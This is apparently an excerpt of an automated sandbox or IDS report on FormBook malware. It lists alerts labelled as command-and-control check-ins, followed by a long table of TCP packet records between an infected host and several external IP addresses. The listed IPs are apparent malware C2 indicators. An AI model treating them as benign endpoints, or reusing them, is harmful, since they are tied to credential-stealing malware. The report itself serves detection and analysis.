                                                                                                      2024-10-22T09:06:46.889813+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450038199.59.243.22780TCP
                                                                                                      2024-10-22T09:06:49.440440+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450039199.59.243.22780TCP
                                                                                                      2024-10-22T09:06:55.179364+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004013.248.169.4880TCP
                                                                                                      2024-10-22T09:06:57.744337+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004113.248.169.4880TCP
                                                                                                      2024-10-22T09:07:00.395619+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004213.248.169.4880TCP
                                                                                                      2024-10-22T09:07:03.044507+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45004313.248.169.4880TCP
                                                                                                      2024-10-22T09:07:09.453120+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004438.88.82.5680TCP
                                                                                                      2024-10-22T09:07:11.984031+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004538.88.82.5680TCP
                                                                                                      2024-10-22T09:07:14.566018+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004638.88.82.5680TCP
                                                                                                      2024-10-22T09:07:17.153961+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45004738.88.82.5680TCP
                                                                                                      2024-10-22T09:07:22.881536+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500483.33.130.19080TCP
                                                                                                      2024-10-22T09:07:25.434010+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500493.33.130.19080TCP
                                                                                                      2024-10-22T09:07:27.988871+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500503.33.130.19080TCP
                                                                                                      2024-10-22T09:07:31.444169+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4500513.33.130.19080TCP
                                                                                                      2024-10-22T09:07:37.350389+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450052178.79.184.19680TCP
                                                                                                      2024-10-22T09:07:39.913570+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450053178.79.184.19680TCP
                                                                                                      2024-10-22T09:07:42.532922+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450054178.79.184.19680TCP
                                                                                                      2024-10-22T09:07:45.006622+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450055178.79.184.19680TCP
                                                                                                      2024-10-22T09:07:50.972903+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005684.32.84.3280TCP
                                                                                                      2024-10-22T09:07:53.519373+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005784.32.84.3280TCP
                                                                                                      2024-10-22T09:07:56.160914+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005884.32.84.3280TCP
                                                                                                      2024-10-22T09:07:58.721216+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45005984.32.84.3280TCP
                                                                                                      2024-10-22T09:08:04.948879+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450060188.114.96.380TCP
                                                                                                      2024-10-22T09:08:07.287998+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450061188.114.96.380TCP
                                                                                                      2024-10-22T09:08:10.453723+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450062188.114.96.380TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 22, 2024 09:04:43.082916975 CEST4974180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:04:43.088377953 CEST80497413.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:04:43.088527918 CEST4974180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:04:43.096508980 CEST4974180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:04:43.101898909 CEST80497413.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:04:43.729077101 CEST80497413.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:04:43.729607105 CEST80497413.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:04:43.729667902 CEST4974180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:04:43.732630014 CEST4974180192.168.2.43.33.130.190
                                                                                                      Oct 22, 2024 09:04:43.737910032 CEST80497413.33.130.190192.168.2.4
                                                                                                      Oct 22, 2024 09:04:59.010034084 CEST4974280192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:04:59.015429020 CEST8049742141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:04:59.015535116 CEST4974280192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:04:59.025485992 CEST4974280192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:04:59.030915976 CEST8049742141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:04:59.705552101 CEST8049742141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:04:59.705627918 CEST8049742141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:04:59.705661058 CEST8049742141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:04:59.705683947 CEST4974280192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:04:59.705833912 CEST8049742141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:04:59.705869913 CEST8049742141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:04:59.705905914 CEST8049742141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:04:59.705950975 CEST4974280192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:04:59.705950975 CEST4974280192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:04:59.706444979 CEST8049742141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:04:59.708283901 CEST8049742141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:04:59.709352970 CEST4974280192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:00.537554979 CEST4974280192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:01.563128948 CEST4974580192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:01.569561005 CEST8049745141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:01.571616888 CEST4974580192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:01.581177950 CEST4974580192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:01.587397099 CEST8049745141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:02.264273882 CEST8049745141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:02.264451027 CEST8049745141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:02.264486074 CEST8049745141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:02.264533997 CEST4974580192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:02.264594078 CEST8049745141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:02.264628887 CEST8049745141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:02.264647007 CEST4974580192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:02.264662981 CEST8049745141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:02.264714956 CEST4974580192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:02.265738964 CEST8049745141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:02.265815020 CEST4974580192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:03.084470987 CEST4974580192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:04.102690935 CEST4975680192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:04.108110905 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.108231068 CEST4975680192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:04.117714882 CEST4975680192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:04.123158932 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.123189926 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.123218060 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.123267889 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.123296976 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.123342991 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.123370886 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.123420954 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.123449087 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.799812078 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.799880981 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.799891949 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.799927950 CEST4975680192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:04.800082922 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.800095081 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.800107956 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.800118923 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.800127029 CEST4975680192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:04.800158978 CEST4975680192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:04.801279068 CEST8049756141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:04.801326990 CEST4975680192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:05.631361961 CEST4975680192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:06.649615049 CEST4977180192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:06.655067921 CEST8049771141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:06.655159950 CEST4977180192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:06.661153078 CEST4977180192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:06.668632030 CEST8049771141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:07.343538046 CEST8049771141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:07.344741106 CEST8049771141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:07.345040083 CEST4977180192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:07.347683907 CEST4977180192.168.2.4141.193.213.10
                                                                                                      Oct 22, 2024 09:05:07.352971077 CEST8049771141.193.213.10192.168.2.4
                                                                                                      Oct 22, 2024 09:05:12.369143963 CEST4980380192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:12.374553919 CEST80498038.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:12.374627113 CEST4980380192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:12.389537096 CEST4980380192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:12.394871950 CEST80498038.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:13.362375021 CEST80498038.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:13.412511110 CEST4980380192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:13.561321974 CEST80498038.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:13.561384916 CEST4980380192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:13.897047043 CEST4980380192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:14.917001009 CEST4981980192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:14.922408104 CEST80498198.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:14.922518015 CEST4981980192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:14.937289953 CEST4981980192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:14.942660093 CEST80498198.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:15.909924984 CEST80498198.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:15.959388971 CEST4981980192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:16.102245092 CEST80498198.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:16.102382898 CEST4981980192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:16.443903923 CEST4981980192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:17.462642908 CEST4983380192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:17.468132019 CEST80498338.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:17.468460083 CEST4983380192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:17.479896069 CEST4983380192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:17.485698938 CEST80498338.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:17.485730886 CEST80498338.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:17.485760927 CEST80498338.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:17.485790014 CEST80498338.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:17.485838890 CEST80498338.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:17.485867977 CEST80498338.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:17.485897064 CEST80498338.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:17.485924959 CEST80498338.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:17.485953093 CEST80498338.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:18.448095083 CEST80498338.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:18.490658045 CEST4983380192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:18.642258883 CEST80498338.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:18.642363071 CEST4983380192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:18.990844011 CEST4983380192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:20.021694899 CEST4984680192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:20.027021885 CEST80498468.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:20.027087927 CEST4984680192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:20.047442913 CEST4984680192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:20.052788019 CEST80498468.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:21.006030083 CEST80498468.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:21.053266048 CEST4984680192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:21.203388929 CEST80498468.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:21.203623056 CEST4984680192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:21.204596996 CEST4984680192.168.2.48.210.3.99
                                                                                                      Oct 22, 2024 09:05:21.209975958 CEST80498468.210.3.99192.168.2.4
                                                                                                      Oct 22, 2024 09:05:26.370170116 CEST4988280192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:26.375598907 CEST8049882162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:26.375747919 CEST4988280192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:26.388324022 CEST4988280192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:26.393670082 CEST8049882162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:27.248363018 CEST8049882162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:27.248508930 CEST8049882162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:27.248522043 CEST8049882162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:27.248637915 CEST4988280192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:27.249203920 CEST8049882162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:27.249253988 CEST4988280192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:27.249696970 CEST8049882162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:27.249708891 CEST8049882162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:27.249722958 CEST8049882162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:27.249752998 CEST8049882162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:27.249804974 CEST4988280192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:27.249804974 CEST4988280192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:27.249804974 CEST4988280192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:27.897679090 CEST4988280192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:28.916142941 CEST4989880192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:28.922760963 CEST8049898162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:28.923110962 CEST4989880192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:28.934535027 CEST4989880192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:28.939845085 CEST8049898162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:29.601711988 CEST8049898162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:29.601767063 CEST8049898162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:29.601804018 CEST8049898162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:29.601840019 CEST8049898162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:29.601878881 CEST8049898162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:29.601890087 CEST4989880192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:29.601890087 CEST4989880192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:29.639924049 CEST8049898162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:29.640069008 CEST4989880192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:30.444077015 CEST4989880192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:31.474359035 CEST4990980192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:31.479770899 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:31.479849100 CEST4990980192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:31.491347075 CEST4990980192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:31.496714115 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:31.496745110 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:31.496779919 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:31.496789932 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:31.496798038 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:31.496823072 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:31.496831894 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:31.496917963 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:31.496927977 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:32.174969912 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:32.175024033 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:32.175035000 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:32.175115108 CEST4990980192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:32.175142050 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:32.175173044 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:32.175190926 CEST4990980192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:32.175410986 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:32.175491095 CEST4990980192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:32.213994026 CEST8049909162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:32.214076042 CEST4990980192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:33.006632090 CEST4990980192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:34.025774956 CEST4992580192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:34.031111956 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.031383038 CEST4992580192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:34.039135933 CEST4992580192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:34.044466019 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.718128920 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.718189001 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.718204975 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.718238115 CEST4992580192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:34.718436003 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.718451977 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.718462944 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.718482018 CEST4992580192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:34.718502045 CEST4992580192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:34.718851089 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.718867064 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.718877077 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.718892097 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.718908072 CEST4992580192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:34.718950033 CEST4992580192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:34.723490953 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.757046938 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:34.757215023 CEST4992580192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:34.758093119 CEST4992580192.168.2.4162.0.215.244
                                                                                                      Oct 22, 2024 09:05:34.763417959 CEST8049925162.0.215.244192.168.2.4
                                                                                                      Oct 22, 2024 09:05:39.798296928 CEST4995680192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:39.804251909 CEST8049956162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:39.804662943 CEST4995680192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:39.815593004 CEST4995680192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:39.821584940 CEST8049956162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:40.499548912 CEST8049956162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:40.537692070 CEST8049956162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:40.537781954 CEST4995680192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:41.319617033 CEST4995680192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:42.339200020 CEST4997280192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:42.344968081 CEST8049972162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:42.345118999 CEST4997280192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:42.357556105 CEST4997280192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:42.363013983 CEST8049972162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:43.030884027 CEST8049972162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:43.070214033 CEST8049972162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:43.070430994 CEST4997280192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:43.867338896 CEST4997280192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:44.900590897 CEST4998780192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:44.906761885 CEST8049987162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:44.906862020 CEST4998780192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:44.921472073 CEST4998780192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:44.926932096 CEST8049987162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:44.926949978 CEST8049987162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:44.926959038 CEST8049987162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:44.926970005 CEST8049987162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:44.926986933 CEST8049987162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:44.926997900 CEST8049987162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:44.927020073 CEST8049987162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:44.927030087 CEST8049987162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:44.927040100 CEST8049987162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:45.872486115 CEST8049987162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:45.872529030 CEST8049987162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:45.872771978 CEST8049987162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:45.873181105 CEST4998780192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:46.428283930 CEST4998780192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:47.448213100 CEST4999780192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:47.478028059 CEST8049997162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:47.480716944 CEST4999780192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:47.487998962 CEST4999780192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:47.680741072 CEST8049997162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:48.165419102 CEST8049997162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:48.203510046 CEST8049997162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:48.203739882 CEST4999780192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:48.204549074 CEST4999780192.168.2.4162.0.231.203
                                                                                                      Oct 22, 2024 09:05:48.209837914 CEST8049997162.0.231.203192.168.2.4
                                                                                                      Oct 22, 2024 09:05:53.351807117 CEST5002380192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:53.357166052 CEST8050023103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:53.357316971 CEST5002380192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:53.368431091 CEST5002380192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:53.373760939 CEST8050023103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:54.302256107 CEST8050023103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:54.350122929 CEST5002380192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:54.481719971 CEST8050023103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:54.481786966 CEST5002380192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:54.881436110 CEST5002380192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:55.900743008 CEST5002580192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:55.906127930 CEST8050025103.71.154.12192.168.2.4
                                                                                                      Oct 22, 2024 09:05:55.906368971 CEST5002580192.168.2.4103.71.154.12
                                                                                                      Oct 22, 2024 09:05:55.917819023 CEST5002580192.168.2.4103.71.154.12
